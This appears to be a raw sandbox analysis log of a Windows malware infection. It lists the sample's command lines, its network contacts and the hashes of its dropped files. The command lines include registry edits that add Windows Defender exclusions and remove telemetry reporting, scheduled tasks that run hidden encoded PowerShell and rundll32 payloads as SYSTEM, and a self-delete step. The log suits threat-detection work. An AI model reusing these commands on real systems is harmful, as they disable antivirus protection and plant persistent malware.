0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXmMMWGSr" /SC once /ST 00:54:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXmMMWGSr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXmMMWGSr"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 00:33:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe\" Ty /zHsite_idTXl 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "mRaseIvrfxDtBOYKW"
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe Ty /zHsite_idTXl 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\TRDYCX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\ABWjUqu.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "eGwAoTnpAObQfPU"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\kWMHQKZ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\KXGcMEN.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ArGlQVg.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\uLcyUgC.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 01:49:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll\",#1 /LPsite_idCBc 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FTXCzbcEvROqagNdd"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll",#1 /LPsite_idCBc 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll",#1 /LPsite_idCBc 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 8.8.8.8:53 | mihomeme.info | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| US | 8.8.8.8:53 | operandotwo.com | udp |
| US | 8.8.8.8:53 | shipofdestiny.com | udp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | namemail.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | cu82342.tw1.ru | udp |
| US | 172.67.160.247:443 | operandotwo.com | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| IE | 38.180.21.119:80 | mihomeme.info | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 104.21.32.142:443 | shipofdestiny.com | tcp |
| US | 104.21.32.142:443 | shipofdestiny.com | tcp |
| RU | 176.57.210.144:443 | cu82342.tw1.ru | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | lawyerbuyer.org | udp |
| US | 8.8.8.8:53 | guseman.org | udp |
| US | 104.21.63.71:443 | lawyerbuyer.org | tcp |
| US | 104.21.63.71:443 | lawyerbuyer.org | tcp |
| US | 104.21.80.30:443 | guseman.org | tcp |
| US | 8.8.8.8:53 | d.392391234.xyz | udp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.200.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.21.180.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.210.57.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.63.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.80.21.104.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 22.45.164.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 138.91.171.81:80 | | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 8.8.8.8:53 | 65.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| DE | 185.172.128.209:80 | | tcp |
| US | 172.67.188.178:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 15.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.182.26.185.in-addr.arpa | udp |
| NL | 185.26.182.122:443 | download.opera.com | tcp |
| US | 104.18.10.89:443 | | tcp |
| US | 52.137.106.217:443 | | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.45:80 | | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| GB | 95.101.143.243:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 243.143.101.95.in-addr.arpa | udp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| IE | 38.180.21.197:80 | | tcp |
| US | 8.8.8.8:53 | 7b03294c-e7ad-4c6b-b472-a303c4562dae.uuid.dumppage.org | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| NL | 82.145.216.20:443 | | tcp |
| NL | 82.145.216.20:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| NL | 82.145.216.15:443 | | tcp |
| US | 8.8.8.8:53 | server8.dumppage.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun3.l.google.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.111:443 | server8.dumppage.org | tcp |
| CH | 172.217.210.127:19302 | stun3.l.google.com | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 127.210.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.94.21.104.in-addr.arpa | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| IE | 38.180.21.197:80 | | tcp |
| BG | 185.82.216.111:443 | server8.dumppage.org | tcp |
| IE | 38.180.21.197:80 | | tcp |
| IE | 38.180.21.197:80 | | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 121.150.80.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| GB | 142.250.200.46:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.200.46:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api3.check-data.xyz | udp |
| US | 44.240.147.44:80 | api3.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 44.147.240.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server8.dumppage.org | udp |
| BG | 185.82.216.111:443 | server8.dumppage.org | tcp |
Files
memory/1472-0-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1472-1-0x0000000074C40000-0x00000000753F0000-memory.dmp
memory/1472-2-0x0000000002CC0000-0x0000000002CD0000-memory.dmp
C:\Users\Admin\Pictures\M94hYF7nkXejEGFT9Wacecol.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe
| MD5 | b46ef79a30cf9668a63ff8117f36f749 |
| SHA1 | 23c339a3eb84d2d9dedf4ae0eafeaaa8d5cde7ed |
| SHA256 | 248e44bc57e583378e77b3b1d6d9677a9dcd00187ea0aa3cbe073fa6fba984fc |
| SHA512 | 2891d70de1be8e7c2a5eebb88b6b8fc2c70cf1278a6d81ecb2b1220c44986eea4938c6a1cf7321b33d347cf4313d5520c3c24a017ceec2087b69ca07c12709da |
memory/3092-25-0x0000000000780000-0x0000000000880000-memory.dmp
memory/3092-26-0x00000000006F0000-0x000000000075E000-memory.dmp
memory/3092-27-0x0000000000400000-0x0000000000563000-memory.dmp
C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe
| MD5 | 7960d8afbbac06f216cceeb1531093bb |
| SHA1 | 008221bf66a0749447cffcb86f2d1ec80e23fc76 |
| SHA256 | f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84 |
| SHA512 | 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147 |
memory/2244-41-0x00000000002E0000-0x000000000034E000-memory.dmp
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe
| MD5 | 57917c9d909d6593f553332b771293d2 |
| SHA1 | 436739f18e604d055f2ce4e9ba3f63d02f3eca36 |
| SHA256 | 74421cf57bb567278ef86d05310b72e99016ab735b2f6ddaa5576e8691b628c1 |
| SHA512 | a8a06e7f9bd33c91cf4a19cc4d0c4c4f426264cc647bb26b96606c3aabbf0b2b508f0de707cc0a3f201ca4a9fc2aee49ac6d94ad78328597363cb0ada8084d6d |
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe
| MD5 | 1a437a8204040da4c0244f453be85309 |
| SHA1 | d627511d8f47ae29857d35857b9ce00700f43b35 |
| SHA256 | 8d0e2c499abab5bccfbaf89150cc1d02ec2d4dd03e40568b6d6968cb57160275 |
| SHA512 | fd88a4f7af01d5705cfa2b449a366da57083e6278321614a89bab0779d8f657af35ba24122b78f27be76112c32f1aa1569b7798bea868c72b75f45487d1ec886 |
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe
| MD5 | 36df303e22db2d7a169883551712d8be |
| SHA1 | f8896876297e56aeab1ac70b76c8c89b9c41bfaf |
| SHA256 | ade273d2965e081dd1a4763b79741693948c5f91147d527e5ad4d6a1102738ca |
| SHA512 | 7f740af64295f373ebbea6f9140fd0e67554acc69f1f10aef538dccd7bab50a45406d590babb8f14d8615151e65c08f80a4d688bb3be09ed827c68b755b81988 |
memory/2244-53-0x0000000074C40000-0x00000000753F0000-memory.dmp
memory/2244-56-0x00000000025C0000-0x00000000025D0000-memory.dmp
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe
| MD5 | 335ccc624361e65295fae7b3add51fcb |
| SHA1 | 8018cb07dc239e6de4b677f748cd428d0a3fc177 |
| SHA256 | 06bb469874aeba58cf585b9860a676628c0f97127b0505330e1c1475bfd5007b |
| SHA512 | 6de47b4b8fc40614cd44e1a6045143d71ebd502b6d373be3c8b03f452e8af126d1b491c5f1e5d11cad1c3f341bf28f7a7796576348bdc5459f1709a44d44205d |
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe
| MD5 | 6e98cd275f72a180e83e3d12c34081b9 |
| SHA1 | 8aaf29f593d8fa3bd4a6562e32997594abc48460 |
| SHA256 | d730ce7a14d21f9cb7b47a0aabb2f55160aba975b31ed35ac11b34e7412bf83b |
| SHA512 | 95d627dcf8d58ca3991b139162a9988314a36e71cf36bd4dd297b5062127bd712e52c0b8b9d28107a0958d26057508450d03c16f9f6ff6fc20b5ee5f9df659f3 |
memory/1108-64-0x0000000000400000-0x000000000046D000-memory.dmp
memory/1108-70-0x0000000000400000-0x000000000046D000-memory.dmp
memory/2244-71-0x0000000002740000-0x0000000004740000-memory.dmp
memory/3548-73-0x0000000002D50000-0x000000000363B000-memory.dmp
memory/3548-74-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/1108-75-0x0000000000400000-0x000000000046D000-memory.dmp
memory/3180-76-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3548-77-0x0000000002940000-0x0000000002D45000-memory.dmp
memory/3180-78-0x0000000002990000-0x0000000002D95000-memory.dmp
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe
| MD5 | 90c91ca7bd6b800754eb3e38567397b2 |
| SHA1 | fc248e0f5651e4f8ec2a0a0e43131b41af80da69 |
| SHA256 | 0bd4436327ab2698eb7ba8a3d04c563cfe8509dcb666c7349715a3c9a17f5921 |
| SHA512 | fd3bab98d0b3af637f911cf9f3b321fded476f3b59b816de0df0c542e221173d16e12c12d299721fd818a4bdb6c2781bbddbd399b520438c7746668ab5c16ec9 |
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe
| MD5 | c78cf4d0cd31b98ca2d50f7e12158c83 |
| SHA1 | eec31482454a2cc661e4958fcc32371cb2a2c49b |
| SHA256 | 71abbd4f0af143393630312cb3cab75f8689c2cd9406d27d8a6e9392cc0138fe |
| SHA512 | 119484e10f7082a039e2e7f9cb59fe43adbdd13dd4f63fc93d1310bcd83c60e00331463e4826a57495562576533ec5360ca41da2255f35d3c482edd926239f92 |
memory/3700-90-0x00000000029A0000-0x0000000002DA3000-memory.dmp
memory/3700-91-0x0000000002DB0000-0x000000000369B000-memory.dmp
memory/3700-93-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2244-94-0x0000000074C40000-0x00000000753F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe
| MD5 | d6f7a547f0161592665e5f835a1299e0 |
| SHA1 | 2d1954be78fa93efa9b7539b0b111daa9c3bfcc2 |
| SHA256 | f92ff36a1b7765fba64b4e4e407b1c42a1175a10fe254ec86b6a313342c7a331 |
| SHA512 | 0d0a4d79203cf33dae88d43bd04dbc2380e7ea5354b9ccadab8fc3c267487696e83011f91715036c056bc70f482e65e87a6c25d7659955642b54c2db95ef0d68 |
memory/3636-106-0x0000000000400000-0x000000000063B000-memory.dmp
memory/3636-105-0x00000000006D0000-0x00000000006F7000-memory.dmp
memory/3636-104-0x0000000000760000-0x0000000000860000-memory.dmp
memory/1472-103-0x0000000074C40000-0x00000000753F0000-memory.dmp
memory/1108-109-0x0000000003620000-0x0000000003A20000-memory.dmp
memory/1108-111-0x00007FFFB0F70000-0x00007FFFB1165000-memory.dmp
memory/1108-112-0x0000000003620000-0x0000000003A20000-memory.dmp
memory/3092-110-0x0000000000400000-0x0000000000563000-memory.dmp
memory/1108-115-0x0000000003620000-0x0000000003A20000-memory.dmp
memory/5016-116-0x0000000001090000-0x0000000001099000-memory.dmp
memory/1108-114-0x0000000076950000-0x0000000076B65000-memory.dmp
memory/3092-108-0x0000000000780000-0x0000000000880000-memory.dmp
memory/3548-119-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/5016-118-0x0000000002BF0000-0x0000000002FF0000-memory.dmp
memory/1108-121-0x0000000000400000-0x000000000046D000-memory.dmp
memory/4264-120-0x0000000002F10000-0x0000000002F46000-memory.dmp
memory/4264-124-0x0000000002F00000-0x0000000002F10000-memory.dmp
memory/4200-126-0x00000000053D0000-0x00000000059F8000-memory.dmp
memory/1852-128-0x0000000074C40000-0x00000000753F0000-memory.dmp
memory/1852-129-0x0000000002AF0000-0x0000000002B00000-memory.dmp
memory/4200-130-0x0000000074C40000-0x00000000753F0000-memory.dmp
